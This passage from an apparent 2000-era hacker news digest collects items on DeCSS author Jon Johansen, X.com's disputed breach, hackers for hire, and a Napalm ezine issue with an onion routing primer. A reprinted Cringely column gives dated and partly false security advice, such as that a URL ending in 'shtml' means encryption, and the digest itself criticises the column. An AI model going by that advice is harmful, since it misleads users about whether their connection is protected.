who only point to problems, Garfinkel offers sound advice about alternatives to many privacy-damaging practices. For instance, he acknowledges the importance of protecting the public against acts of terrorism. But he says this can be done without infringing on the rights of private citizens or casting a wide net of suspicion over an entire ethnic or religious group. What is required, he writes, is careful planning and thoughtfulness about difficult issues - something most government and private organizations are not willing to do. But Garfinkel's most interesting and probably most controversial thesis is that government, rather than being the Big Brother of George Orwell's "1984," is the average citizen's best friend in the fight to protect privacy - and that vigorous, muscular legislation, as opposed to voluntary standards, is the best way to protect citizens' rights. <P> Garfinkel's book comes at a good time. Many experts believe that privacy and security issues will ultimately dwarf the Y2K hysteria of the past two years. "Database Nation" gives a way to detect the privacy land mines in our culture and ultimately disarm them. DATABASE NATION. By Simson Garfinkel. O'Reilly Books. 320 pages, $24.95 Tom Regan is associate editor of The Christian Science Monitor's Electronic Edition. You can e-mail him at tom@csmonitor.com -=- Database Nation; http://www.databasenation.com/home.htm The book. @HWA 80.0 HNN: Feb 1st: Interview with DeCSS Author ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalypse Dow Jon Johansen, the 16-year-old Norwegian member of the Masters of Reverse Engineering (MoRE) and co-author of DeCSS has given an interview to "Linux World". Definitely a good interview that sheds some light on the whole case. (Especially liked the part about him backing up the source code to his cell phone.) CNN http://www.cnn.com/2000/TECH/computing/01/31/johansen.interview.idg/index.html OpenDVD.org http://www.opendvd.org CNN: (Interview) Meet the kid behind the DVD hack January 31, 2000 Web posted at: 11:03 a.m. EST (1603 GMT) by J.S. Kelly (IDG) -- On Monday, January 24, authorities in Norway searched the home of Jon Johansen, a 16-year-old Norwegian member of the Masters of Reverse Engineering (MoRE) -- the group which created the DeCSS DVD playback utility for Linux. Jon and his father Per Johansen have both been indicted by Norway's Department of Economic Crime. LinuxWorld talked to Jon about DeCSS, the investigation, the controversy -- and about why he feels that this case is at the same time so ridiculous and so important. LinuxWorld: How did this whole thing start? How did you get involved with DVD and DeCSS? Jon Johansen: Well, I got involved with DVD about two years ago. I bought my first DVD-ROM and an MPEG-2 decoder card. And, about at the end of September last year, I got in contact with a German computer programmer and a Dutch computer programmer, and we decided that it was time to add DVD support to Linux -- and, of course, to other operating systems, such as FreeBSD. LinuxWorld: Had you expected any problems like this when you set about to make the player? Jon Johansen: We knew that they would probably go after someone. But when [Norwegian authorities] visited me yesterday with a search warrant, I really hadn't expected them to, because it's been about two or three months now since [the subject] first appeared in the media and, well, to me, that's a pretty long time. LinuxWorld: You removed the code from your Webpages when they asked you to, and have been cooperating with what they have asked of you, is that right? Jon Johansen: Actually, I was only linking [to the source code] and they wanted me to remove the link -- which I did, so that I could think it over. And then the link appeared again on my Website at the end of the week. LinuxWorld: Did they question you at your house? Jon Johansen: No. They took me to the local police station. But my father was sick, so they questioned him here at home. LinuxWorld: But they just took you in for questioning -- they didn't arrest you or anything like that? Jon Johansen: Well, the biggest Norwegian newspaper regarded this as an arrest, since they hadn't told us that they were coming and they brought me in. So the biggest Norwegian newspaper looked upon that as an arrest. LinuxWorld: But did they give you a choice to not go in for questioning? Jon Johansen: Well, of course I do have the right to have an attorney present. So I [could have] told them that I did not want to do it without an attorney, [and] they would have had to call my attorney and schedule an appointment. LinuxWorld: And you didn't do that. Jon Johansen: No, I didn't do that. LinuxWorld: Why? Jon Johansen: Basically, because I didn't have anything to hide. So I decided to cooperate. LinuxWorld: The code that you wrote -- now, is it called DeCSS or is it CSS-auth? Jon Johansen: It's called DeCSS. LinuxWorld: OK. Because I've seen conflicting media reports on that, and other things. Like, some say that you are 15, others say you are 16. Jon Johansen: I'm 16 now, I was 15 when it happened ... and the encryption code wasn't in fact written by me, but written by the German member. There seems to be a bit of confusion about that part. LinuxWorld: The other two people that you had worked with to make the player are remaining anonymous -- is that right? Jon Johansen: Yes, that is correct. LinuxWorld: Do you think they will try to find out who they are from the data on your computer? Jon Johansen: Yes, probably. They also asked what I knew about them. But I don't have the identity of any of them. I only had the nicks that they used on Internet Relay Chat. LinuxWorld: And did you give those up? Jon Johansen: Well, lately they have been changing nicks from time to time. So I gave one of the nicks they had used before. LinuxWorld: Do you know why they want to remain anonymous? Jon Johansen: They are both a lot older than me, and they are employed. So I guess they just didn't want the publicity, and they were perhaps afraid of getting fired. LinuxWorld: And why is your father involved in this? Jon Johansen: Basically because he owns the domain [at which] my Webpages were located. LinuxWorld: And how do your parents feel about this whole thing? Jon Johansen: They consider it [to be] just as stupid as I do. The charge is totally off-topic. It doesn't have anything to do with reality. LinuxWorld: Do you know why they took your cell phone? Jon Johansen: I asked them why, and they said that they considered it to be so advanced that they had to take it in, because it was a Nokia 91-10. And I did have, in fact, a backup of the source on it. LinuxWorld: And do you know what is going to happen next? Jon Johansen: They are currently investigating, and I still haven't received my computers back. So I have ordered a new one today, which I will be receiving on Friday. Which is a bit too late, because ABC News is coming tomorrow, and I was supposed to demonstrate DVD playback under Linux. So I'm going to call some people now and try to get hold of a computer with a DVD-ROM and get Linux installed on it. LinuxWorld: So, can DeCSS in fact in any way be used for pirating? I mean, I realize that isn't the purpose for which it was written. Jon Johansen: Well, yes, it can be used for pirating. Because you can decrypt a DVD disk and put it on your hard drive and then you can convert it, say, to VCD and then post it on the Internet. But tools to do that had already been available on the Internet, long before DeCSS, which was also a complete digital solution which gave you the same quality. So DeCSS didn't introduce anything new for pirating and had already been available. LinuxWorld: So why do you think they are going after you, and not the authors of the other tools? Jon Johansen: Well, the authors of the other tools are, as far as I know, anonymous. And [in] the charge, they say that the encryption is copy protection. But that's not correct at all. Anyone with a little computer experience knows that anything can be copied bit-by-bit with the right equipment. LinuxWorld: And the authors of the other tools didn't break the encryption? Those previous tools had been written for the Windows platform, is that right? Jon Johansen: Yes. There was one tool, I think it was called DVD-rip, which I believe actually hacked in to the Xing DVD player and then, when the Xing DVD player had decrypted the MPEG stream, the DVD-rip utility dumped that stream to disk and you had yourself an unencrypted DVD movie. LinuxWorld: Well, it seems then all the more that they should be going after those other authors. Jon Johansen: I guess it is because those other tools haven't received any media attention. But perhaps they don't even know about them -- but I would think that they do, because they are not that stupid. LinuxWorld: Why did you decide to come forward and to not to remain anonymous? Jon Johansen: We discussed it in the group and they thought it was OK, and I think the first reporter I talked to was from Wired. I think it was Declan [McCullugh], and he asked me if he could publish my name, and since we had already talked it over in MoRE, I said yes. LinuxWorld: Are you sorry now that you did? Jon Johansen: Not really, because I think the fight we are now fighting is a very important fight for free speech and for the open source community. LinuxWorld: Why is it so important? Jon Johansen: Basically, if reverse engineering is banned, then a lot of the open source community is doomed to fail. Because [you need to reverse-engineer] when creating software for compatibility with, for example, Microsoft Windows. For example, Samba was totally dependant on reverse engineering. Of course, the whole computer industry was allowed to reverse-engineer IBM's BIOS. LinuxWorld: What was your reaction to the injunctions in the US? Jon Johansen: I was a bit surprised, but then I read about how EFF [the Electronic Frontier Foundation] had presented the defense. And, if what I read on Slashdot about that was true, then I don't understand how exactly EFF could have argued that way. LinuxWorld: Why? Jon Johansen: Well, what I read on Slashdot was that they basically said that the encryption was bad, and it was kind of their fault. And I don't understand why they used those arguments. LinuxWorld: What kind of arguments would you have expected, or what kind of arguments do you think might have been better? Jon Johansen: I would have expected for them to try to explain to the court that this had nothing to do with copying, because encryption does not prevent copying -- which the DVD CCA [Copy Control Association] and MPAA are claiming. And everybody knows that even if something is encrypted you can still copy it if the reading of the data goes through decryption. LinuxWorld: At the hearing I attended, the defense did argue that the DVD encryption was flawed. At the same hearing, the plaintiffs had some really, some pretty strong feelings about the way people have been acting when they repost the code. Do you know about that? Jon Johansen: I did actually read on Slashdot where the plaintiffs had actually read from Slashdot debates. LinuxWorld: Exactly. And they picked out only the ones which were saying things like "fuck the law." And so they picked those out on purpose and they said, "Look at these people. They don't want to play back movies. They are saying 'fuck the law.'" So do you have anything to say to people about that? Jon Johansen: Well, that's really sad that they can't behave, because they should have known that the plaintiffs would have used something like that against us. They should stop doing things like that and help inform the media that this has nothing to do with copying but [rather has to do with] with playback. LinuxWorld: How best can people help to do that? Jon Johansen: Well, first of all they could head over to OpenDVD.org, and see what's written there, and then perhaps call or email their local media, and inform them about the case. LinuxWorld: Thanks, Jon, for talking to us. We wish you the best of luck. @HWA 81.0 HNN: Feb 1st: X.com Denies Security Breach ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Online bank X.com has denied recent media reports of a security breach. The company does acknowledged that six unauthorized transactions totaling less than $10,000 combined had taken place sometime between mid-December and mid-January. According to the company these suspicious transactions do not constitute a security breach but are in fact a policy issue. (Bad policy can lead to poor security.) Newsbytes http://www.cnnfn.com/news/technology/newsbytes/143017.html No Security Breach Occurred, Online Bank Says January 31, 2000: 2:23 p.m. ET SAN FRANCISCO, CALIFORNIA, U.S.A. (NB) -- By Kevin Featherly, Newsbytes. Officials at X.com are crying foul at the way an alleged "security breach" was played in the media last week, after reports surfaced that suspected thieves had accessed the online bank's Web site and transferred money to X.com accounts from unrelated accounts in other banks. Bill Harris, X.com's CEO and the former CEO of Intuit, told Newsbytes this weekend that there was never a security breach or software bug in the X.com online banking system. Also, he said, the system was changed to a more tightly controlled one prior to reports surfacing in the media. Harris acknowledged that six unauthorized transactions totaling less than $10,000 combined had taken place sometime between mid-December, when the company launched for business, and mid-January, when the system was changed. He acknowledged that the six transactions were "suspicious," and said they are being investigated. "We had these six instances where people said (they) had unauthorized transfers," Harris said. "As a result, based on our own internal analysis, we instituted as of (Jan. 22) a policy where no transfers (were possible) without a voided check." Until Dec. 22, Harris said, it was possible for customers to make transactions of up to $2,500 to or from other banks via the Web without having to send in voided copies of checks by fax. For two weeks or so at the beginning of the company's history, it had been possible to make a maximum of $15,000 in transfers to or from other banks without sending in voided checks. Now, all transactions must be preceded by a faxed copy of a voided check. The system fell under scrutiny last week after the New York Times ran a story detailing the unauthorized money transfers, and referring to the issue as a security breach. Meanwhile, Newsbytes quoted Elias Levy, chief technology officer at San Francisco-based SecurityFocus.com, who said that his company confirmed there was a problem by setting up an account with X.com, and attempting to perform a transfer from one SecurityFocus staff member's bank account into an X.com account created in another employee's name. Within a couple of days, the money transfer went through, Levy said. SecurityFocus.com then alerted X.com to the problem. But the bank had already changed the system to a more restrictive one by then, Levy said. X.com's Harris said that nobody from SecurityFocus talked to any management staff at the online bank, but said it might be accurate, as Levy indicated, that he had talked to bank technicians to alert them to what they had done. In any case, Harris said, there was never a security problem. "The issue is one of policy and what policy do we use to allow people to do electronically," Harris said. "The policy that we had been using was one where, up to a certain limit people were allowed to do electronic fund transfers to and from their own bank account by entering in the numbers of those bank accounts. That's actually a practice that is fairly common." Harris compared the practice to the method many e-commerce sites use to transact with credit card holders. Many times, he said, purchases are made in which there is no physical evidence verifying a cardholder's validity. The account numbers are inputted into Web forms, and the transaction takes place. "Obviously, with either a credit card or bank account number, if you accept that information from an individual without seeing the physical card or physical check, there's a chance that the person might get it wrong - mis-enter it or misspeak or misinterpret the wrong number," Harris said. "Or, they may consciously provide the wrong number." Harris has a point, says Rob Leathern, a Jupiter Communications analyst familiar with online banking. Bank fraud is fairly common in the traditional world, he said, and if there were only six unauthorized transactions from X.com, the percentage of their clients victimized by fraud may actually be smaller than is typically found in the brick-and-mortar banking industry. However, reality is one thing, perceptions another. The issue at X.com was sufficiently severe to prompt David Kennedy, director of research services at computer security firm ICSA.net, to call on the company to go out of business. Such draconian measures are hardly called for, says Leathern, who thinks the matter has been blown out of proportion in the press. Still, being an online bank with a high-profile CEO makes the company vulnerable to such accusations, Leathern said. And because the public at large is not yet comfortable with online banking, the bar for security must be set higher at companies like X.com, he said. "I do think that they do need to pay close attention to this kind of stuff, because there is attention," Leathern said. "With a bank, someone is trusting you with their money, so they need to be real careful about the way they manage the consumer's expectations and their concerns. I think to a certain extent, they have to pay more attention to stuff." X.com is a division of La Jara, Colo.,-based First Western National Bank. X.com is on the Web at http://www.x.com/ . Reported by Newsbytes.com, http://www.newsbytes.com . @HWA 82.0 HNN: Feb 1st: Microsoft Security, An Oxymoron? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid In the last two months Microsoft has issued 16 security advisories on its own products, other companies have issued additional advisories as well. So what is the problem? Is it, as Microsoft claims, the wide deployment of Microsoft products or is it the ravages of an unfriendly press? Sm@rt Reseller - via Excite News http://news.excite.com/news/zd/000128/12/whats-wrong-with <article vanished!> @HWA 83.0 HNN: Feb 1st; Cringely, Defcon, E-Commerce and Crypto ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Joey Cringely, who normally has useful stuff to say, delivers a muddled message on the state of ecommerce and security. He says that no system is perfectly secure, and that major intrusions are inevitable. Unfortunately, he then draws an absolute relationship between key length and security, never mentioning implementation as being a factor in the value or safety of crypto products. (He also confuses trashing with social engineering. It is depressing to see a programmer/journalist who was at the first Defcon deliver such a mediocre piece.) PBS http://www.pbs.org/cringely/pulpit/pulpit20000127.html That's Where the Money Is Hold Onto Your Wallet, Because Computer Crime Is Growing Up By Robert X. Cringely Several years ago at the very first DefCon hacker's conference in Las Vegas, Dan Farmer sat like a rock star in the back of the meeting room in the old Sands Hotel. Dressed entirely in black leather with shoulder length flaming red hair, Dan sat trading kisses with two girls while the other speakers droned on. In a culture where nerds speak of women generally as a concept rather than an experience, to see a techie with groupies was a phenomenon. It got even better when Dan finally took his turn at the podium and I learned his position in those days was head of network security for Sun Microsystems. And his message to this room half-filled with young computer criminals and half-filled with Feds trying to not look like Feds was that their efforts were pathetic and boring. Farmer urged them, if they were going to insist on trying to break-in to his network, that they at least come up with techniques that were more clever, more deserving of his attention. This scene has returned to my memory many times since, but especially lately as a new batch of computer criminals seems to be at work. You've seen the stories. Moving-on from simple destruction and mayhem, the new game is blackmail. Some smart kid steals a few thousand passwords or credit card numbers, then uses that theft to extort money from ISPs and e-commerce sites. Only it doesn't work. So far as we know, the ISPs and e-commerce people aren't paying-up. Or are they? Whether they are or not, I am sure that Farmer would find it boring. I know I do. Since I have in the past known a few people operating on the shady side of computer law, my take on this extortion racket is that they are trying to create what they believe to be a victimless crime. Of course it isn't victimless at all. The other attraction is the juvenile satisfaction of trumpeting the crime: "I did this to you, now pay-up." Professional criminals would rather their crime go undetected. These are not professionals. What we are seeing, though, is a progression of criminal acts headed in an escalating direction. There will come a time when ego will be put aside and somebody is going to steal some major bucks. And if the FBI or any other organization says it can't be done, well, they are wrong. It will happen. The point of this column is to give the lay reader a sense of where we currently stand in this war to protect our bytes from being bitten. This is another one of those columns the nerds will see as simplistic and useless, except I pretty much guarantee a close reading will tell most of them something they didn't know before. So, in a world where money isn't greenbacks anymore but electrons flowing through a global network, where teenagers seem to crack Pentagon computers with impunity, where most of us have no idea at all how any of this is accomplished or how to protect ourselves, is our wealth really secure? What's to keep some kid from stealing our IRAs and Keoghs, our CDs and mutual funds, even our identities? Just how safe is our information and, by implication, our money? Are the ways we do business going to have to change? The bad news says that nothing is secure. With enough effort, every technology that we have to protect the data we call money can be broken. The good news is that it nearly always costs more to gain access to our holdings than those holdings are worth. If it costs $100,000 to steal $10,000, nobody will even bother -- or that's the theory. What keeps you from losing your credit card number to some thief when you buy a book or CD at Amazon.com? This is the key question that dogs the proponents of consumer E-commerce. Forget that we hand the same credit card without hesitation to a waiter who might be a career felon, or give the number over the phone to a salesperson who might be working on a telephone bank in some minimum-security prison. People distrust machines, and they are not at all embarrassed to express that distrust. So what's to keep Amazon.com or someone else from stealing our information? Beyond simple morality and ethics, there are two things keeping Amazon.com from robbing us blind: Amazon CEO Jeff Bezos wants to remain a billionaire, and our credit-card information is scrambled, or encrypted, before it is sent over the Net. Bezos knows he makes more money by selling books than he could by stealing from his customers, so he doesn't steal. That keeps Amazon honest. Scrambling the credit card information makes an honest person of everyone else who might be in a position to snoop on your shopping session -- say, a technician at your Internet service provider. To make sure your credit card numbers remain private, use only Internet merchants that offer secure transactions. Before you push that "send" key, make sure the URL line on your web browser starts with "https," not just "http," or ends with "shtml." These mean your outgoing data is being encrypted. Before we get too far into data encryption, understand that the single most popular technique for gaining access to online data is called by its proponents, "social engineering." This is strictly non-technical. Social engineering is a crook tricking us into giving him our Internet password or finding it by searching wastebaskets or looking over shoulders. Why bother to bring in the heavy computing firepower to crack a password if people will hand theirs over to someone who claims to be a customer service representative from the Internet service provider? This is why America Online makes such a point of reminding its users that the company will never ask them for their passwords. Social engineering is a greater threat than all the criminal supercomputers in the world. Nearly all Internet commerce is protected, in whole or in part, by cryptographic software derived from the late-1970s work of three mathematicians at MIT -- Ronald Rivest, Adi Shamir, and Leonard Adleman. The Rivest, Shamir, Adleman algorithm, generally known as simply RSA, represents both a method of scrambling a message between two parties in a way that allows the message to be decoded only at its intended destination and a way of identifying the parties to each other. The patented RSA algorithm comes in several levels of security, defined by the size of prime numbers that are used to generate both the encoding and decoding keys. Nearly all RSA codes use at least 512-bit numbers. (If your browser mentions 40-bit or 128-bit, this is just geekspeak for a complementary technology that works with RSA, trust me.) That's plenty secure for most purposes, though these days many web browsers and serious e-commerce sites have stepped up to 1,024-bit RSA, and the super-paranoid can encode their e-mail messages with 2,048- or even 4,096-bit encryption. More bits means it takes longer to encrypt and decrypt data, but the data is much more secure. Some forms of encryption are cracked through a brute-force method that simply applies a mathematical test to the zillions of possible solutions until one is found that can decode the target message. RSA requires more sophisticated approaches. Five-hundred-twelve-bit RSA was cracked for the first time last August by 292 computers running on and off for seven months -- a total of 35 years of computing time. What is significant about this is that earlier in this decade, the best guess said it would take 50,000 years of computing time to crack 512-bit RSA. So it would take a massive effort to crack your credit card transaction, and that's only if your transaction could be isolated from the millions of others happening each day. On the face of it, e-commerce looks pretty secure. But there is a dark side to all this, which is the ability to use the Internet itself as a means to gang thousands, even millions, of computers together to attack such a problem, possibly without the computer owners' being aware their machines are being used. Take comfort that such firepower would more likely be applied to cracking some giant interbank money transfer than to gaining access to your Discover card. To keep our money secure, the trend is toward harder and harder encryption using more bits. In this way, it is still quite easy to remain comfortably ahead of the criminal community. RSA 1,024-bit encryption is still wondrously secure, to say nothing of 2,048 and 4,096. For the spies among us who don't even trust RSA, there are whole new classes of codes based on elliptical mathematical functions that look to be even harder to crack. But just as cracking 512-bit RSA dropped from 50,000 years of computing time to 35 in less than a decade, the real concern among users of cryptography is that a breakthrough -- a secret breakthrough -- will allow devices to accomplish in seconds what used to take years. Just such a device was described last fall in a now discredited story in The Times of London. The handheld device was supposed to have been invented at Israel's Weizmann Institute of Science and was claimed to crack 512-bit RSA in microseconds. Such a device is probably decades away, but then cracking 512-bit RSA was supposed to take 50,000 years and turned out not to. There is no way of knowing when a breakthrough in quantum computing or another field will make such a device possible. But I can tell you how to know when it has happened. The inventors of such a device wouldn't be content with stealing credit card numbers or siphoning pennies from checking accounts. These would be big thinkers. They would have the ability to literally take control of the world financial system with their device. So we'd awaken one day to a back-to-the-future moment in which some gargantuan shift of resources would have taken place in a manner that would be difficult or impossible to reverse. These are, after all, only the electronic equivalent of ledger entries we are talking about. And on that fateful morning we would wake to find that Russia was suddenly the economic superpower and that the U.S. was begging for foreign aid. Now THAT would impress Dan Farmer. @HWA 84.0 HNN: Feb 1st: Cold War Spies For Hire ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalypse Dow With the cold war all but over international spies need new employment. many of them are earning a living snooping around on the internet. With their services for hire anyone can get the information they desire. MSNBC http://www.msnbc.com/news/364412.asp Cybersnoops: Hackers for hire Former spies and cops sell surveillance skills on the open market Hundreds of overseas agents who were dumped by the CIA in the budget cuts of the mid-'90s are spying for profit on the Internet. By David Ignatius WASHINGTON POST WASHINGTON, Jan. 31 — So you think your computer communications are safe and secure? Hah! You poor, deluded, vulnerable fool. Experts in the security business confide that most computer networks are wide open to attack by dedicated hackers. Indeed, they describe some real-world electronic assaults that would make your bytes turn into bits. WANT TO BREAK into one of Switzerland’s most famous private banks and look at its accounts? Not a problem. Want to break into the computer of a key government agency of a big European country and read messages tasking its security officers? Not a problem. Want to crack corporate networks and read the e-mail traffic? Not a problem. In fact, that’s so easy it’s done routinely. HACKERS FOR HIRE We’re not talking here about electronic intercepts by the National Security Agency or black-bag jobs by the CIA, mind you. These operations are conducted by the growing global network of private security consultants, using sophisticated hacking tools that most of us don’t begin to understand. An example of the hackers’ tool kit is something called a “packet sniffer.” Once the hacker gains access to the electronic transmissions passing through a computer network (which isn’t as hard as you might think) the packet sniffer allows him to read the electronic bundles of information — those little ones and zeros streaming over the Net — and translate them into readable computer files. An apprentice hacker can download the software needed for a packet sniffer from one of many sites on the Net. IN FROM THE COLD 'Companies are much more vulnerable to electronic attack than they realize: corporate firewalls are laden with hidden trapdoors that give access to hackers. ' What’s happening, in effect, is the privatization of some of the most powerful tools traditionally used by intelligence agencies — which allow them to overhear our conversations and read our mail. The new privateers are mostly former spies and law enforcement officers — from Washington to Paris to Moscow to Canberra — who are out now, and offering their skills on the open market. They’re working with former colleagues and liaison contacts around the world — and with the hacker underground — to get the information they need. “The Cold War is over,” explains one member of this private security brotherhood. “People in police and security services are just trying to make money.” One ripe source of information is the hundreds of agents overseas who were dumped by the CIA in the budget cuts of the mid-’90s. Many of them are freelancing now. HOW TO HIRE A SPY If you want access to this network, you can start by contacting one of the high-powered Washington or New York law firms. They, in turn, will contact a private security firm, which will contact a consultant, who will contact another consultant, who will work with hackers, cops, second-story artists — whoever is needed to get the job done. Typically, the person who initiates a request for information at one end of the chain has no idea who actually obtains it, or what methods were used. The sources are shielded by what are known in the spy world as “cut-outs.” If you saw the 1998 movie “Ronin,” you have an idea of how the security brotherhood works. The Ronin are modern-day equivalents of samurai warriors who have been decommissioned after a war and are wandering the landscape looking for work. The movie’s plot is fanciful, but the portrait it draws of a fraternity of ex-spooks for hire is quite accurate. COUNTER-INTELLIGENCE ‘The Cold War is over. People in police and security services are just trying to make money.’ IN PRIVATE SECURITY SPECIALIST Companies that want to protect themselves against these electronic attacks should consider investing in counter-intelligence. An example of what’s available comes from Michael L. Puldy, who heads IBM’s Emergency Response Service. He runs a group of about 100 people worldwide, who help IBM clients clean up the damage from electronic break-ins and try to prevent them from happening in the first place. Puldy explains that companies are much more vulnerable to electronic attack than they realize. They may think they’re protected by so-called “fire walls” that screen who gets into the network. But if the fire-wall software is installed right out of the box, it usually contains default passwords and other trapdoors that allow smart hackers to get in. Puldy’s group mainly does electronic “perimeter checks,” looking for holes in a company’s network, along with installing “intrusion detection monitors,” which sense when a hacker is trying to break in. ETHICAL HACKING One ripe source of information is the hundreds of agents overseas who were dumped by the CIA in the budget cuts of the mid-’90s. Many of them arefreelancing now.... But IBM also offers a more aggressive “Ethical Hacking Service,” which for a fee will actually break into your system and show just how vulnerable it is. Puldy says that IBM’s ethical hackers can penetrate more than 75 percent of the systems they attack. Once inside, they can find password files, break into the corporate e-mail server and read everyone’s mail — sometimes even get into the CEO’s hard drive and read his most private files. Packet sniffers are the enemy, in Puldy’s world. He says that cable modems are especially vulnerable, because given most existing cable technology, it’s easy to read the other computers on a neighborhood cable loop. “If you’re on the neighborhood ring, you can put a sniffer on the cable and watch everything I do on my computer — stock trades, passwords, e-mails, everything,” says Puldy. It’s harder to crack “digital subscriber line” or DSL technology that’s used to provide high-speed connections over phone lines — but not impossible. “Given enough time and effort, you can break into anything you want to,” says Puldy. Civil libertarians still seem to focus their angst on privacy threats from government intelligence and law-enforcement agencies, but they’re way behind the time. Like everything else in the global economy, snooping has been privatized. David Ignatius is a novelist and associate editor of The Washington Post, who writes about business and the economy. © 2000 The Washington Post Company @HWA 85.0 HNN: Feb 1st: More Ezines Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by napalm and Xenos Issue #3 of Napalm and Issue #4 of Digital Defiance have been released. Napalm http://napalm.firest0rm.org/ Digital Defiance http://www.hackers.cx Napalm: Here is ISSUE #1 in its entirety (short release) for a taste of what to expect from this zine: /\ /^/_ _ __ __ _|^|_ __ ___ / \/ / _` '_ \/ _` | | '_ ` _ \ / /\ / (_| |_) (_| | | | | | | | /_/ \/ \__, .__/\__,_|_|_| |_| |_| |_| Issue 1 (Sep. 29, 1999) ___________________________________________________________________________ The gh0st.net project: http://www.gh0st.net/index.html URL of the day: (Computer geek cartoons) http://www.userfriendly.org All content copyright © 1999 by the individual authors, All Rights Reserved ___________________________________________________________________________ - Editor's Comments - URLs - News - My Life As A Happy Hacker - Onion Routing - The gh0st.net Project - Violence, Censorship, & Our Rights - Future Issues - Credits *********************************************************************** *** Editor's Comments : Kynik *********************************************************************** For now, I'm just going to borrow the layout I used while I was HH editor. (Which I am no more.) I'll try to make it a little bit more freeform than this first issue, but we'll have to see. I'd like to see this zine diverge a little from the standard 'security info' theme and get into music, news and whatever tickles everyone's fancy. Email me at kynik@gh0st.net for damn near anything. Oh, and send me good links, too. NOTE: Due to the gh0st.net webserver and mailserver's owner moving very far away soon, the website may be inaccessible for quite some time. You can contact us at napalmzine@hotmail.com until we get everything back up again. Thanks to TF for actually hosting all the web pages and mail server! *********************************************************************** *** Random good URLs : Kynik *********************************************************************** The Roskilde music festival in Copenhagen, Denmark http://www.roskilde-festival.dk/ The OSKit - build your own OS http://www.cs.utah.edu/flux/oskit/ gh0stOS http://www.gh0st.net/gh0stOS/ Good source code for neural networks http://www.geocities.com/CapeCanaveral/1624/ Irish pop-punk http://www.iol.ie/~brooder *********************************************************************** *** My Life As A Happy Hacker : Kynik *********************************************************************** A long time ago (probably 3-4 years) on a computer lab workstation far, far away (ok, it was the Midwest) I discovered the Happy Hacker in my quest for knowledge of the computer sort. I found it after sifting through search engine results of the keyword 'hacker'. I had been inspired by such movies as "Wargames" and "Sneakers" and realized that there was a lot more to this computer thing than Doom and Microsoft Word. Having realized this, I dove headfirst into the web, trying to find a place that suited my wants and actually had an air of intelligence. Many of the sites I found were crude and obviously created by middle-school-aged kids looking to mess with their friends on AOL. Two things I found caught my attention immediately: Silicon Toad and The Happy Hacker mailing list. I proceeded to download a whole pile of programs from Silicon Toad's site, and played with them on my computer at home, but beyond that, didn't do too much. I checked in on it every once in awhile, until the site disappeared. I kept on getting the happy hacker newsletter, and found out how to do some neat, trivial things such as changing my Windows 95 splash screen for startup and shutdown. Then I began to read about some of the things that people had done with their computers, and against the list founder, Carolyn Meinel. I didn't think too much about this at the time, but kept my interested fascination with the whole 'hacker culture' as I progressed with my Computer Science degree. I continued to receive the digest, and towards the end of 1998, I got a Happy Hacker digest with a request for a new UNIX editor. Having read most of the info out there about Carolyn Meinel and the general consensus about her, I thought about it carefully before I sent in an application. I realized the stigma that currently goes along with CPM and the Happy Hacker name, but after consideration, I thought I'd try to keep alive the idea that got me into the Happy Hacker in the first place: Knowledge and Ethics. Granted, CPM is currently more interested in money and promoting herself than educating and instilling ethics, from what I've seen. I emailed her, and asked if the position was still available. She asked me to write a Guide to (Mostly) Harmless Hacking (GTMHH) on any topic I chose. I chose to write a beginner's guide to C++, since there already was one for C. Well, I sent her a small piece of what I had written, and she advised me that Guide submissions are generally much longer. So I set off to flesh it out and expand on the parts she said were somewhat lacking. I got about 2/3 of the way through it, and grad school and work took precedence. A few weeks later, totally to my surprise, I got an email from Carolyn asking me if I wanted the position. I said yes, we exchanged our PGP keys, I got the passwords to the unixeditor POP account, and I started reading submissions and putting them together to form the Happy Hacker UNIX digest. To see the digests, as they were submitted to Carolyn, go to the following URL: http://fire.gh0st.net/hh/index.html The first few digests were pretty weak, as most of the questions I got were rather bland, and I was still getting the feel of the position. I got very few flames, and a lot of praise. I realized that I might actually be making a difference to some people, trying to help them understand the basics (and some details) of UNIX and computer security. When I heard that Carolyn had moved the HH mailserver over to an AntiOnline computer, I wasn't thrilled, but I really didn't care all that much at the moment. Keydet89, the windows editor, apparently left because of this, which was rather sad, because he always had good perl snippets in his digests. (Send me an email keydet, if you wanna tell about your experience, or write some articles :) Then I thought about it. I looked back at AntiOnline's features section, and I thought about JP's article on "Hacker Profiling". Pieces started to fit together. I thought about the possibility that JP was making copies of any mails that I received as a submission and adding them to his pile of material to be filtered and info to be added to the 'hacker database'. See, a lot of times I'll be sent an email claiming to have broken into a site and wanting to know what to do from there. (Or, someone requests me to break into a site for them -- which I'd consider doing, provided you're paying me and the site is yours.) In the second-last HH digest, I included a link to my PGP key, and an alternate email address that people could write to. I'd say about half of the respondents used the other email address... and 2 or 3 used the PGP key. I realized that I needed a bit more creative freedom, without eyes peeking over my shoulders. So, I teamed up with some people I had met online, and had been working with for a little while, and offered to create a new zine, with an emphasis on computers, security, and music. I wanted to give the people that needed a certain amount of mentoring a chance to get some people to talk to if they needed help. I found out that there was a similar group of people working on a project similar to the Happy Hacker wargames, but cooler, and I started hanging out with them as well. So, here ends my Happy Hacker story. I know I've left out some minor details, but don't worry, they weren't that important. Let's have a big round of applause for the gh0st.net and FireStorm guys! Hopefully the projects will pick up soon, and there will be more to see on both the fire.gh0st.net and www.gh0st.net sites. -Kynikeren *********************************************************************** *** Onion Routing : Kynik *********************************************************************** While it seems that the term "Onion Routing" may be copyrighted, I feel that it is a good description of the technology. Onion Routing is an Internet-based system to prevent eavesdropping and traffic analysis. The name "Onion Routing" is appropriate, since it is based upon adding several layers of encryption to a message (and removing them) as it is passed along the network, as one might remove the layers of an onion. (I suppose one could also call it 'artichoke routing' too ;) This is essential to a network where privacy and anonymity is important. "Well, so what about privacy, everything I'm sending to that site is encrypted with SSL, anyways", you may say. That's all fine and dandy, but chances are, anybody monitoring you knows at least that you've been there, since the destination address is plainly readable in the IP header. That's where the anonymity portion comes 